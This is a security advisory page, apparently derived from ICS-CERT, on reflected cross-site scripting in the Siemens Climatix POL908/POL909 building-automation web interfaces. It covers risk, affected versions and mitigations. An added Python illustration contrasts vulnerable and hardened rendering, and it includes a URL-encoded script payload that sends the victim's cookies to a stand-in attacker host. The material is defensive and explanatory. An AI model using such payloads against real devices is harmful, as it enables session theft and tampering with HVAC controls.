Siemens Climatix (Update A)
Monitor · 6.1 · ICS-CERT ICSA-20-105-04 · Apr 14, 2020
Attack Vector: Network
Auth Required: None
Complexity: Low
User Interaction: Required
Summary
Siemens Climatix POL908 (BACnet/IP module) and POL909 (AWM module) are vulnerable to reflected cross-site scripting (XSS) through their web interface. The weaknesses are classified as CWE-79 (improper neutralization of input during web page generation) and CWE-80 (improper neutralization of script-related HTML tags): a value taken from the request is copied into the returned page without encoding, so script supplied in a crafted URL executes in the victim's browser in the origin of the device's web interface. From there it can read session tokens or credentials the browser holds for that origin, or issue configuration changes through the web UI on the user's behalf. The web interface is enabled by default in some configurations and, by default, enforces no authentication.
What this means
What could happen
An attacker who tricks a user into opening a crafted link (for example from a phishing email or a page the attacker controls) gets script executed in that user's browser in the context of the Climatix web interface, which can expose session data, change device configuration, or redirect the user to a phishing site.
Who's at risk
Building automation system operators and facility managers who use Siemens Climatix climate control modules (POL908 and POL909) for HVAC management and building integration. Risk is highest for installations with the web interface enabled for remote or on-site monitoring.
How it could be exploited
An attacker crafts a URL to the Climatix POL908 or POL909 web interface that carries script in a parameter the device's web server echoes back unencoded, and delivers it to staff who use the interface, typically by phishing email. When a user opens the link, the device returns a page containing the attacker's script, which runs in the user's browser as if it were part of the Climatix web interface (reflected XSS). The script can then capture credentials, hijack the session, or alter device settings through the web UI.
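The pattern behind a reflected XSS of this kind, shown as an added example that is not code from the Climatix firmware or from the advisory. The endpoint path, the echoed parameter name (`page`) and the attacker URL are constructed assumptions chosen to illustrate the bug class; the real device pages are not known. The block builds the same "page not found" response twice, once the vulnerable way and once with output encoding plus a Content-Security-Policy header, and a small check shows the difference.

```python
"""Reflected XSS: vulnerable reflection beside its hardened form.

Added illustration, not Siemens code. Path, parameter name and attacker
URL below are hypothetical and constructed for this example.
"""
from html import escape
from typing import Dict, Tuple
from urllib.parse import parse_qs, urlsplit


def reflected_value(url: str) -> str:
    """Return the 'page' query parameter of a request URL ('' if absent).

    The parameter name is an assumption; it stands for any value the web
    server copies straight from the request into the HTML it returns.
    """
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get("page", [""])[0]


def render_vulnerable(url: str) -> str:
    """Build the response the way a reflected-XSS-prone server does:
    the request value is interpolated into the page with no encoding,
    so any markup in the URL becomes markup in the response."""
    name = reflected_value(url)
    return f"<html><body><h1>Page not found: {name}</h1></body></html>"


def render_hardened(url: str) -> Tuple[Dict[str, str], str]:
    """Same response, hardened.

    The request-derived value is HTML-entity encoded for the context it
    lands in (element text), so '<' and '>' reach the browser as '&lt;'
    and '&gt;' and are never parsed as tags. A Content-Security-Policy
    that allows no script sources is added as defence in depth: should
    an encoding gap remain elsewhere, inline script is still blocked.
    """
    name = escape(reflected_value(url), quote=True)
    headers = {
        "Content-Type": "text/html; charset=utf-8",
        "Content-Security-Policy": "default-src 'none'; base-uri 'none'; frame-ancestors 'none'",
        "X-Content-Type-Options": "nosniff",
    }
    body = f"<html><body><h1>Page not found: {name}</h1></body></html>"
    return headers, body


# Constructed attacker URL: the classic reflected-XSS shape, a script
# payload in a parameter the server echoes back. Hostnames are fictitious.
# Decoded, the parameter reads:
#   <script>document.location='http://attacker.example.invalid/?'+document.cookie</script>
ATTACK_URL = (
    "http://climatix.example.invalid/notfound"
    "?page=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fattacker.example.invalid"
    "%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E"
)


def contains_script_tag(html: str) -> bool:
    """Crude check used only to contrast the two responses: does the body
    contain an unencoded <script> element?"""
    return "<script>" in html.lower()


if __name__ == "__main__":
    print(render_vulnerable(ATTACK_URL))
    print(render_hardened(ATTACK_URL)[1])
```

Run as a script it prints both responses: the vulnerable one carries a live `<script>` element, the hardened one only the entity-encoded text. Output encoding is the actual fix; the CSP header is worth adding anyway because it costs nothing on a static device UI and blocks inline script even where a reflection was missed.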
Prerequisites
- User must access the Climatix web interface via a web browser
- Web interface must be enabled on POL908 or POL909
- User must click a malicious link or visit a crafted URL
- The reflecting page is reachable without authentication (default configuration), so the attacker needs no credentials to craft the link
Tags: remotely exploitable, low complexity, user interaction required (phishing/social engineering), no authentication required by default, reflected XSS vulnerability
Exploitability
Low exploit probability (EPSS 0.4%)
Affected products (2)
1 with fix, 1 EOL
Product                              Affected versions   Fix status
Climatix POL908 (BACnet/IP module)   All versions        No fix (EOL)
Climatix POL909 (AWM module)         < V11.32            Fixed in V11.32
Remediation & Mitigation
Do now
WORKAROUND: If the web interface must remain enabled, enforce authentication and change the default ADMIN password
WORKAROUND: Disable JavaScript in web browsers used to access the Climatix web interface
WORKAROUND: Use a modern web browser with integrated XSS filtering (note that major browsers have since removed their built-in XSS filters, so this control should not be relied on by itself)
WORKAROUND: Disable access to the default webpages on POL909 and use only custom web applications
Schedule — requires maintenance window
Patching may require a device reboot; plan for process interruption
Climatix POL909 (AWM module): < V11.32
HOTFIX: Update Climatix POL909 (AWM module) to version 11.32 or later
Climatix POL908 (BACnet/IP module): All versions
HOTFIX: Update Climatix POL908 to version 11.22 or later, which disables the web interface by default (this reduces exposure; it does not correct the XSS, for which no fix is available on POL908)
Mitigations - no patch available
Climatix POL908 (BACnet/IP module), all versions, has reached End of Life. The vendor will not release a patch. Apply the following compensating controls:
HARDENING: Isolate Climatix devices behind a firewall and restrict network access to the web interface
HARDENING: Ensure Climatix devices are not accessible from the Internet or business networks
HARDENING: Consider removing POL908 and using the integrated BACnet/IP capability of newer Climatix 600 controllers instead
CVEs (2)